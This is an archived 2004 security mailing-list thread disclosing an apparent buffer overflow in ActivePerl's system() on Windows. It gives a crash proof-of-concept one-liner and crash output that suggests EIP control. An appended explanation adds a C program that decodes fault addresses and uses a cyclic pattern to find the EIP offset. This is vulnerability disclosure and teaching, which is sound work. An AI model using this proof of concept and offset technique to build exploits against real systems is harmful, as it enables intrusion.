lists.openwall.net: Open Source and information security mailing list archives
 
Date: Tue, 18 May 2004 20:30:46 +0545
From: npguy <npguy@...surfer.com.np>
To: Nick FitzGerald <nick@...us-l.demon.co.uk>
Cc: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: Re: Re: Buffer Overflow in ActivePerl ?


perl, v5.8.2 MSWin32-x86-multi-thread suffers the same.


Tuesday, May 18, 2004, 7:14:41 PM, you wrote:

NF> "Oliver@...yhat.de" <Oliver@...yhat.de> wrote:

>> i played around with ActiveState's ActivePerl for Win32, and crashed
>> Perl.exe with the following command:
>> 
>> perl -e "$a="A" x 256; system($a)"

NF> Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus
NF> all but last week's security patch:

NF>    perl -e "$a="A" x 256; system($a)"

NF>    perl.exe - Application error

NF>    Unhandled instruction at "0x77fcc83d" referenced memory at
NF>    "0x00657865".  The memory could not be "written".

NF> Also, it is likely exploitable -- push up the number of A's a bit:

NF>    C:\>perl -e "$a="A" x 259; system($a)"

NF>    perl.exe - Application error

NF>    Unhandled instruction at "0x77fcc83d" referenced memory at
NF>    "0x65004141".  The memory could not be "written".

NF> and we seem to get control of EIP.  Coincidence?  Try yet two more:

NF>    C:\>perl -e "$a="A" x 261; system($a)"

NF>    perl.exe - Application error

NF>    Unhandled instruction at "0x77fcc83d" referenced memory at
NF>    "0x41414141".  The memory could not be "written".

NF> Looks like full control of EIP...

NF> However, there is not likely to be a privilege escalation here unless
NF> perhaps a script processor on a web server can be cajoled into doing
NF> something with this??  (Not at all familiar with the innards of Windows
NF> web servers and their relationship to their CGI, etc processors...)





       npguy                            npguy€websurfer.com.np

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
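The three "referenced memory at" values quoted above are worth reading as bytes. On x86 a 32-bit value is stored little-endian, so 0x00657865 is the byte sequence 65 78 65 00, i.e. "exe" followed by a NUL; 0x65004141 is 41 41 00 65, i.e. "AA", NUL, "e"; and 0x41414141 is "AAAA". That is how you tell a fault address that came from your own input apart from one that did not. The C program below is an added example, not code from either poster or from Perl: it decodes those three values, and then shows the general form of the "push up the number of A's" experiment, a cyclic pattern in which every 4-byte window is unique, so one crash maps the value seen in EIP back to an offset in the string instead of needing several runs. It assumes the common pattern_create triplet scheme (uppercase, lowercase, digit), does not invoke Perl or reproduce the crash, and the value it looks up is constructed from the pattern itself rather than taken from a real register dump.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Render a 32-bit address from a Windows crash dialog as the four bytes
 * it occupies in memory on x86 (little-endian: low byte first). Printable
 * bytes are copied into text[], anything else becomes '.'; the raw bytes
 * are also returned in raw[] for callers that want exact values. */
static void decode_fault_addr(uint32_t addr, char text[5], unsigned char raw[4])
{
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)((addr >> (8 * i)) & 0xffu);
        raw[i] = b;
        text[i] = (b >= 0x20 && b < 0x7f) ? (char)b : '.';
    }
    text[4] = '\0';
}

/* Fill buf with the uppercase/lowercase/digit triplet pattern
 * ("Aa0Aa1Aa2...") used by pattern_create-style tools (assumed scheme).
 * Every 4-byte window in the first 20280 bytes is distinct, so a value
 * that later shows up in EIP or in a fault address maps back to exactly
 * one offset. Returns the number of bytes written; buf is not
 * NUL-terminated because a NUL would end the string early in system(). */
static size_t cyclic_pattern(char *buf, size_t len)
{
    size_t n = 0;
    for (char u = 'A'; u <= 'Z'; u++)
        for (char l = 'a'; l <= 'z'; l++)
            for (char d = '0'; d <= '9'; d++) {
                const char tri[3] = { u, l, d };
                for (int k = 0; k < 3; k++) {
                    if (n == len)
                        return n;
                    buf[n++] = tri[k];
                }
            }
    return n;
}

/* Read the 4 bytes at pattern[off..off+3] as a little-endian uint32,
 * i.e. the value the CPU would show if those bytes were loaded into EIP. */
static uint32_t value_at(const char *pattern, size_t off)
{
    const unsigned char *p = (const unsigned char *)pattern + off;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Find the offset within the pattern whose little-endian 4-byte value is
 * `value`. Returns -1 when the value did not come from the pattern, e.g.
 * a genuine code address, or the "exe\0" bytes seen with 256 A's. */
static long cyclic_offset(const char *pattern, size_t len, uint32_t value)
{
    unsigned char want[4];
    for (int i = 0; i < 4; i++)
        want[i] = (unsigned char)((value >> (8 * i)) & 0xffu);
    for (size_t off = 0; off + 4 <= len; off++)
        if (memcmp(pattern + off, want, 4) == 0)
            return (long)off;
    return -1;
}

int main(void)
{
    /* The three fault addresses quoted in the message, for 256, 259 and 261 A's. */
    const uint32_t seen[3] = { 0x00657865u, 0x65004141u, 0x41414141u };
    const int lengths[3] = { 256, 259, 261 };
    char text[5];
    unsigned char raw[4];

    for (int i = 0; i < 3; i++) {
        decode_fault_addr(seen[i], text, raw);
        printf("%3d A's: 0x%08x = bytes %02x %02x %02x %02x = \"%s\"\n",
               lengths[i], seen[i], raw[0], raw[1], raw[2], raw[3], text);
    }

    /* Same experiment with a cyclic pattern: send it once, then look the
     * crash value up. The value here is constructed from the pattern, not
     * taken from a real crash. */
    char pattern[512];
    size_t n = cyclic_pattern(pattern, sizeof pattern);
    uint32_t hypothetical_eip = value_at(pattern, 261);
    printf("pattern value 0x%08x maps to offset %ld\n",
           hypothetical_eip, cyclic_offset(pattern, n, hypothetical_eip));
    return 0;
}
```

With an all-"A" string the fault address only tells you that controlled bytes reached the pointer, which is why it took three runs above to see 0x41414141; with the cyclic pattern the same dialog tells you the exact offset in one run, and a value that is not found in the pattern (such as the "exe" bytes) tells you the faulting pointer came from somewhere other than your input.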

